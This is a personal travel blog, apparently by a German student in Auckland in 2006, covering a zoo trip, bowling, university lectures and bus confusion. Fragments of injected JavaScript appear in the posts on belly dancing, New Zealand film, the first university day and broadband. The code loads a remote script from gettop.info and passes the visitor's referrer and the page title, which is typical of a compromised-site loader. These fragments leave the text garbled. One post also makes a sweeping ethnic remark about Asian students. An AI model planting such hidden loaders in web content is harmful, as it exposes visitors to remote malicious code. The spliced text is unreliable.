Going in the Zoo!

Posted by admin On March - 24 - 2006

This friday I went with the three little boys and there grandparents in the zoo. We used the bus and you can imagine it was fun for them. Think Oliver (4 years), Jakeb (2 1/2 years) and Nathan (2 years) used the bus the first time. The Auckland zoo itself was ok but not really exciting. Most animals were hidden or sleeping. When I come home I felt so destroyed that I went straight to bed for sleeping…

Bowling for Auckland

Posted by admin On March - 23 - 2006

Believe it or not – I was bowling. Had lost all games but my performance increased. Maybe I need more to be trained. After bowling we went all together (Adrian, Paul and me) to a pub to meet Nicole and Michael. We had a great time and lots of fun.

One other day with little Jakeb

Posted by admin On March - 17 - 2006

Usually on Friday I see little Jakob, the 2 1/2 year old little son of Blair’s sister Melanie. He is so funny mostly a bit obstinately. He loved to be in the center of all attention. And as well he loves sports like kicking the ball, jumping on his trampoline and driving his kids vehicles.

Belly Dancing

Posted by admin On March - 16 - 2006

Blair‘s mother is a passionate dancer and she teaches for years Arabian dance classes. So this evening I joined the class. But stop – I was not dancing… I just watched the class. Was pretty interesting, nice moves. But actually funny as well. I prefer to take pictures or write.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) {

New Zealand Film

Posted by admin On March - 14 - 2006

Today I got up early in the morning at 7:30am. Usually I’m not be wont to get up early. Anyway I had to catch the bus to the city at 8:45am. My timetable shows the lecture and the tutorial of the “New Zealand Film” Course. For me it was much more interesting because we talked about first New Zealand Film and filmmakers and also watched some details of the movie from John O´Shea “Broken Barrier”. It´s about a love story between a white man (Pakeha) and a Maori girl. The film streaks racial prejudices between the native New Zealand people and the Whites in New Zealand. It’s made in 1952 and should be the first New Zealand Movie.
The way home today was stress free and in the bus I met a student and a neighbor girl.if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);

My first day at Auckland University

Posted by admin On March - 13 - 2006

Today was my first day at the University of Auckland. After all the trouble with the different system here and the mentality of the New Zealand people I finally accept the challenge to study. My timetable says first lesson is a lecture about Media Analysis at 1:00pm. In fact it´s nothing new for me, we only talked about the manner of representation of two photos in a kind of art magazine. One was an ad the other a documentary picture. The lesson took only 1 hour, so actually I takes more time for the way from Henderson to the university at the city center of Auckland and back as the lecture itself . Unfortunately in Auckland they have to different public transportation companies: Stagecoach (what I use) and Richies. I’m a bloody starter in using the bus so what happened is, that after finishing university I stood for about 1 hour at the wrong station, waiting for my Stagecoach bus – only Richie buses arrived….But believe me I’m not the only one who’s confused of the system. New Zealand people have there problems with this as well. So finally I was home at about 5:00pm. Bad luck….Next day I will make it!} else {

The Xtra Broadband Connection

Posted by admin On March - 2 - 2006

Now I’m in New Zealand for about one week now. It seems to be a nice country. But you can’t compare it to Germany. How would you feel, if you missed everything what your life makes comfortable? Meanwhile, I have my own internet-connection broadband. And indeed I’ve got a NZ-Cellular and bank account. So I feel more Comfortable.
I will stay at the house of the friend of mine, Blair, parents. They live almost in Auckland, in a suburb called Henderson. It´s quite nice, but unfortunately far from the city. People here normally use the car, but I will try the bus first…yesterday I had my first drivers training in a big Pajero on the right-sided car, automatic.
I got up early in the morning because I brought Blair to the airport, he was leaving back to Melbourne.
I had fixed all my courses in university today. Was a annoying thing, what took me more than one week. Also it waste the time of Blair and me. In result I can’t do the courses I prefer. So if I would be asked after studying at Auckland University I can’t recommend it. It is simply a moneymaking business and foreigner pay double of the money than national students. That is one reason why you feel at the University of Auckland like you study in Hong Kong – all Asians!
Tomorrow I will do a short one-week-trip at the north island with the girl, Claudia, I had meet in the airplane. So far…if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);

First day in New Zealand

Posted by admin On February - 22 - 2006

On my first day Blair showed me Bethells beach. It was a wonderful beach but windy. And it is similar to the beach where “The Piano” was made. Interesing is the black sand almost like ash. Somebody told me that on the west coast of NZ the beaches have these black sand and on the eastern side white sand. Later we visited Blairs brother and sister and there kids – four boys.
